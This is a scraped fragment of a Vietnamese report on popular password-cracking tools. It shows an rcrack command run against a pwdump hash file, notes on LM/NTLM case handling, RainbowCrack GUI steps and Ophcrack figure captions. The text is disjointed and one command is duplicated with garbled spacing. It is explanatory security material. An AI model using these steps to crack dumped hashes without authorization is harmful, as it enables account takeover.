rcrack c:\rt\*.rt -f pwdump_file rcrack c: \ rt \ * rt-f pwdump_file

Các thuật toán băm LM chuyển đổi tất cả chữ thường trong plaintext thành chữ hoa, kết quả là tất cả các plaintexts nứt qua băm LM không bao giờ có chữ thường, trong

khi plaintext thực tế có thể chứa chữ thường Chương trình rcrack sẽ cố gắng làm điều chỉnh trường hợp với NTLM hashes được lưu trữ trong cùng một tập tin và cho ra bản original plaintext

V.Thực hiện tiến trình RainbowCrack trong

windows:

Bước 1: Tải các băm

Bước 2: Xác định các bảng rainbow cần tìm kiếm

Trang 36

Chọn menu "Search Rainbow Tables " xác định các rainbow tables cá nhân để tìm kiếm:

Trang 37

Chọn menu "Search Rainbow Tables In Directory " để tìm kiếm tất cả rainbow tables trong một thư mục:

Trang 38

Chọn menu "Search Rainbow Tables In Profile " xác định một chuỗi rainbow tables để tiếp tục tìm kiếm:

Ngày đăng: 24/03/2014, 07:20

HÌNH ẢNH LIÊN QUAN

Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau: - Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf
Hình 1 Chọn các compornents để cài đặt vào mục tables cho ophcrack Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau: (Trang 2)
Hình 2: Giao diện Ophcrack trên Windows - Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf
Hình 2 Giao diện Ophcrack trên Windows (Trang 3)
Hình 3: Select ophcrack table. - Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf
Hình 3 Select ophcrack table (Trang 4)
Hình dưới đây giải thích mối quan hệ giữa các công cụ. - Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf
Hình d ưới đây giải thích mối quan hệ giữa các công cụ (Trang 29)
Bảng hệ lệnh Các lệnh rtgen được sử dụng để tạo ra các bảng cầu vồng là: - Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf
Bảng h ệ lệnh Các lệnh rtgen được sử dụng để tạo ra các bảng cầu vồng là: (Trang 32)

TỪ KHÓA LIÊN QUAN

TRÍCH ĐOẠN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w